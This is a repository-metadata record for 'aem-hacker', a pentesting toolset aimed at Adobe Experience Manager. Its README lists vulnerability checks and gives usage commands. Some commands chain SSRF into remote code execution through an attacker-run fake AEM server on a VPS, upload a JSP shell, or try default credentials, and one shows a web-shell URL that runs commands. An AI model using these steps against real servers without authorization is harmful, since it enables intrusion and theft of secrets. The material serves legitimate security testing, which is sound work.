{"id":13633407,"url":"https://github.com/0ang3el/aem-hacker","last_synced_at":"2025-05-16T13:03:55.235Z","repository":{"id":45797122,"uuid":"149915655","full_name":"0ang3el/aem-hacker","owner":"0ang3el","description":null,"archived":false,"fork":false,"pushed_at":"2024-07-28T16:15:08.000Z","size":63,"stargazers_count":787,"open_issues_count":15,"forks_count":166,"subscribers_count":30,"default_branch":"master","last_synced_at":"2025-04-12T08:29:40.463Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0ang3el.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-09-22T20:32:16.000Z","updated_at":"2025-04-07T15:28:11.000Z","dependencies_parsed_at":"2024-08-01T23:37:16.897Z","dependency_job_id":null,"html_url":"https://github.com/0ang3el/aem-hacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0ang3el","download_url":"https://codeload.github.com/0ang3el/aem-hacker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://
github.com","kind":"github","repositories_count":254535826,"owners_count":22087398,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T23:00:37.869Z","updated_at":"2025-05-16T13:03:55.177Z","avatar_url":"https://github.com/0ang3el.png","language":"Python","readme":"# Toolset for AEM hacking\n\nTools to identify vulnerable Adobe Experience Manager (AEM) webapps. \u003ca href=\"https://www.adobe.com/marketing/experience-manager.html\"\u003eAEM is an enterprise-grade CMS\u003c/a\u003e.\n\nI've built these tools to automate bughunting and pentesting of AEM webapps. I've included checks for previously known vulnerabilities and misconfigurations, as well as for new ones discovered by me in 2018/2019. **All discovered vulnerabilities were responsibly reported to Adobe PSIRT**.\n\nYou can find more details about the vulnerabilities and techniques in the presentations I've prepared for the \u003ca href=\"https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\"\u003eHacktivity conference\u003c/a\u003e and \u003ca href=\"https://www.youtube.com/watch?v=EQNBQCQMouk\"\u003eLevelUp 0x03\u003c/a\u003e.\n\nAEM webapps are widespread and rarely configured securely or kept up to date. 
Bughunter, you have a good chance of finding security bugs; enjoy the tools!\n\nMikhail Egorov (\u003ca href=\"https://twitter.com/0ang3el\"\u003e@0ang3el\u003c/a\u003e)\n\n## Scripts\n\n* `aem_hacker.py` - main script to scan an AEM webapp for vulnerabilities.\n* `aem_discoverer.py` - script to discover AEM webapps from a list of URLs.\n* `aem_ssrf2rce.py`, `aem_server.py`, `response.bin` - scripts to get RCE from SSRF.\n* `aem-rce-sling-script.sh` - script to get RCE by uploading a JSP shell to the /apps JCR node.\n\n## aem_hacker.py\n**Important:** You need a VPS to detect SSRF vulnerabilities!\n\nThe tool tries to bypass the AEM dispatcher.\n\nThe following checks are currently implemented:\n* `Exposed DefaultGetServlet` - checks if JCR nodes that might contain sensitive information and secrets are exposed via DefaultGetServlet.\n* `Exposed QueryBuilderJsonServlet and QueryBuilderFeedServlet` - if those servlets are exposed, it might be possible to access various sensitive information and secrets.\n* `Exposed GQLServlet` - GQLServlet is similar to QueryBuilderFeedServlet.\n* `Ability to create new JCR nodes` - checks if it's possible to create a new JCR node.\n* `Exposed POSTServlet` - POSTServlet allows creating, modifying and deleting content in the JCR. Depending on your access level, it's possible to get stored XSS or RCE. 
\n* `Exposed LoginStatusServlet, CurrentUserServlet and UserInfoServlet` - if those servlets are exposed, it might be possible to bruteforce credentials.\n* `Users with default password` - checks for admin:admin, author:author, etc.\n* `Exposed Felix Console` - an exposed Felix Console might lead to RCE by uploading a backdoor OSGi bundle.\n* `Enabled WCMDebugFilter` - a WCMDebugFilter vulnerable to CVE-2016-7882 might lead to reflected XSS.\n* `Exposed WCMSuggestionsServlet` - an exposed WCMSuggestionsServlet might lead to reflected XSS.\n* `Exposed CRXDE and CRX` - checks for exposure of CRXDE and CRX.\n* `Exposed Reports` - checks for exposure of reports.\n* `SSRF SalesforceSecretServlet` - checks for SSRF via SalesforceSecretServlet (CVE-2018-5006). SSRF might allow exfiltrating secrets or performing XSS.\n* `SSRF ReportingServicesServlet` - checks for SSRF via ReportingServicesServlet (CVE-2018-12809). SSRF might allow exfiltrating secrets or performing XSS.\n* `SSRF SitecatalystServlet` - checks for SSRF via SitecatalystServlet. SSRF might allow getting RCE with the help of aem_ssrf2rce.py when a specific AEM version and appserver are used.\n* `SSRF AutoprovisioningServlet` - checks for SSRF via AutoprovisioningServlet. SSRF might allow getting RCE with the help of aem_ssrf2rce.py when a specific AEM version and appserver are used.\n* `SSRF Opensocial Proxy` - checks for SSRF via the Opensocial (Shindig) proxy. SSRF might allow exfiltrating secrets or performing XSS.\n* `SSRF Opensocial MakeRequest` - checks for SSRF via Opensocial (Shindig) makeRequest. SSRF might allow exfiltrating secrets or performing XSS. You can use the parameters `httpMethod`, `postData`, `headers` and `contentType` with `makeRequest`.\n* `SWF XSSes` - checks for XSSes via SWF.\n* `Deser ExternalJobServlet` - checks for a vulnerable (deserialization) ExternalJobServlet.\n* `Exposed Webdav` - checks for access to the JCR via the WebDAV protocol. 
Exposed WebDAV might lead to XXE (CVE-2015-1833) or stored XSS.\n* `Exposed Groovy Console` - an exposed Groovy Console leads to RCE.\n* `Exposed ACS AEM Tools` - exposed ACS AEM Tools leads to RCE.\n* `Exposed GuideInternalSubmitServlet` - an exposed GuideInternalSubmitServlet is vulnerable to XXE (CVE-2019-8086).\n* `Exposed MergeMetadataServlet` - might be vulnerable to reflected XSS.\n* `Exposed SetPreferences page` - might be vulnerable to reflected XSS.\n\n#### Help\n```\nusage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST]\n                     [--port PORT] [--workers WORKERS]\n                     [-H [HEADER [HEADER ...]]] [--handler HANDLER]\n                     [--listhandlers]\n\nAEM hacker by @0ang3el, see the slides -\nhttps://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -u URL, --url URL     url to scan\n  --proxy PROXY         http and https proxy\n  --debug               debug output\n  --host HOST           hostname or IP to use for back connections during SSRF\n                        detection\n  --port PORT           opens port for SSRF detection\n  --workers WORKERS     number of parallel workers\n  -H [HEADER [HEADER ...]], --header [HEADER [HEADER ...]]\n                        extra http headers to attach\n  --handler HANDLER     run specific handlers, if omitted run all handlers\n  --listhandlers        list available handlers\n```\n\n#### Usage\n```\npython3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip\n```\n\nor\n\n```\npython3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip --handler groovy_console --handler salesforcesecret_servlet\n```\n\n## aem_discoverer.py\nThe script scans a list of URLs and finds AEM webapps among them.\n\nThe tool tries to bypass the AEM dispatcher.\n\n#### Help\n```\npython3 aem_discoverer.py -h\nusage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug]\n                         [--workers WORKERS]\n\nAEM discoverer by @0ang3el, see the slides -\nhttps://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\n\noptional arguments:\n  -h, --help         show this help message and exit\n  --file FILE        file with urls\n  --proxy PROXY      http and https proxy\n  --debug            debug output\n  --workers WORKERS  number of parallel workers\n```\n\n#### Usage\n```\npython3 aem_discoverer.py --file urls.txt --workers 150\n```\n\n## aem_ssrf2rce.py, aem_server.py, response.bin\nHelps to turn SSRF in `SitecatalystServlet` and `AutoprovisioningServlet` into RCE. It should work on AEM versions before AEM-6.2-SP1-CFP7 running on Jetty (the default installation).\n\n#### Help\n\n```\npython3 aem_ssrf2rce.py -h\nusage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY]\n\noptional arguments:\n  -h, --help         show this help message and exit\n  --url URL          URL for SitecatalystServlet or AutoprovisioningServlet,\n                     including path, without query part\n  --fakeaem FAKEAEM  hostname/ip of fake AEM server\n  --proxy PROXY      http and https proxy\n```\n\n#### Usage\nPlace `aem_server.py` and `response.bin` on your VPS. Run the `aem_server.py` script.\n\n```\npython3 aem_server.py\nstarting fake AEM server...\nrunning server...\n```\n\nRun the `aem_ssrf2rce.py` script.\n\n```\npython3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip\n```\n\nIf RCE is possible, you should see an incoming connection to your fake AEM server. 
After replication, you can access your shell from `https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls`.\n\n## aem-rce-sling-script.sh\nThe script is handy when the Felix Console is not available but you have permissions to create new nodes under the `/apps` JCR node.\n\n#### Usage\n\n```\n./aem-rce-sling-script.sh https://aem.webapp username password\n```\n","funding_links":[],"categories":["Miscellaneous","Python","Python (1887)"],"sub_categories":["CMS"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0ang3el%2Faem-hacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0ang3el%2Faem-hacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0ang3el%2Faem-hacker/lists"}